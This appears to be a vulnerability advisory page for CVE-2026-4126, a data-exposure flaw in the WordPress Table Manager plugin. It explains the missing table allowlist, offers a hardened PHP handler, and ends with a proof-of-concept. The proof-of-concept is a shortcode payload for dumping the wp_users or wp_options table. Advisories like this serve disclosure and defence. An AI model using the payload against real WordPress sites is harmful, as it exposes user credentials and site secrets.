Security Vulnerability Report
CVE-2026-4126 CVSS 4.3 MEDIUM

CVE-2026-4126

Published: 2026-04-22 09:16:24
Last Modified: 2026-04-22 20:22:51

Description

The Table Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.0 via the 'table_manager' shortcode. The shortcode handler `tablemanager_render_table_shortcode()` takes a user-controlled `table` attribute, applies only `sanitize_key()` for sanitization, and concatenates the value with `$wpdb->prefix` to form a full database table name. It then executes `DESC` and `SELECT *` queries against this table and renders all rows and columns to the frontend. There is no allowlist check to ensure only plugin-created tables can be accessed; the `tablemanager_created_tables` option is only referenced in admin functions, never in the shortcode handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data from arbitrary WordPress database tables.
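As an added illustration of the missing check the description refers to (this is not the plugin's code), here is a hardened shortcode handler that consults the `tablemanager_created_tables` option before touching the database. It assumes that option stores an array of plugin-created table-name suffixes (without the prefix); the function name and the HTML rendering are assumptions as well.

```php
<?php
// Added example, not the plugin's own code. Hardened handler for
// [table_manager table="..."] that allowlists the table name against the
// 'tablemanager_created_tables' option. Assumption: that option holds an
// array of table-name suffixes (without $wpdb->prefix) the plugin created.
function tablemanager_render_table_shortcode_hardened( $atts ) {
    global $wpdb;

    $atts  = shortcode_atts( array( 'table' => '' ), $atts, 'table_manager' );
    $table = sanitize_key( $atts['table'] );

    // sanitize_key() alone is not enough: names such as 'users' or 'options'
    // pass it unchanged. Require that the plugin itself created the table.
    $allowed = (array) get_option( 'tablemanager_created_tables', array() );
    if ( '' === $table || ! in_array( $table, $allowed, true ) ) {
        return ''; // Unknown table: render nothing and run no query.
    }

    $full_name = $wpdb->prefix . $table;

    // Identifiers cannot be bound as prepared-statement values; the
    // allowlist above is what makes interpolating $full_name acceptable.
    $rows = $wpdb->get_results( "SELECT * FROM `{$full_name}`", ARRAY_A );
    if ( empty( $rows ) ) {
        return '';
    }

    // Escape every column name and cell on output.
    $html = '<table class="table-manager"><thead><tr>';
    foreach ( array_keys( $rows[0] ) as $col ) {
        $html .= '<th>' . esc_html( $col ) . '</th>';
    }
    $html .= '</tr></thead><tbody>';
    foreach ( $rows as $row ) {
        $html .= '<tr>';
        foreach ( $row as $cell ) {
            $html .= '<td>' . esc_html( (string) $cell ) . '</td>';
        }
        $html .= '</tr>';
    }
    return $html . '</tbody></table>';
}
add_shortcode( 'table_manager', 'tablemanager_render_table_shortcode_hardened' );
```

The same allowlist should gate the `DESC` query the original handler runs, since column names are sensitive on their own.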

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Table Manager <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Exploit Title: WordPress Table Manager <= 1.0.0 - Sensitive Information Exposure (PoC)
# Description: This shortcode demonstrates how to leak data from the wp_users table.
# Usage: Insert the following shortcode into a post or page content as a Contributor user.

# Malicious Shortcode Payload
# The plugin appends the table prefix (e.g., wp_) to the provided value.
# To dump the users table, we use 'users'.
payload = "[table_manager table='users']"

# Alternatively, to access options table:
# payload = "[table_manager table='options']"

print(f"Insert this shortcode into a post content: {payload}")
```

References

Weakness: CWE-200
Record status: Deferred

https://plugins.trac.wordpress.org/browser/table-manager/tags/1.0.0/table-manager.php#L561
https://plugins.trac.wordpress.org/browser/table-manager/tags/1.0.0/table-manager.php#L572
https://plugins.trac.wordpress.org/browser/table-manager/tags/1.0.0/table-manager.php#L573
https://plugins.trac.wordpress.org/browser/table-manager/trunk/table-manager.php#L561
https://plugins.trac.wordpress.org/browser/table-manager/trunk/table-manager.php#L572
https://plugins.trac.wordpress.org/browser/table-manager/trunk/table-manager.php#L573
https://www.wordfence.com/threat-intel/vulnerabilities/id/25b3607c-f99e-4359-8228-0f3452f80aac?source=cve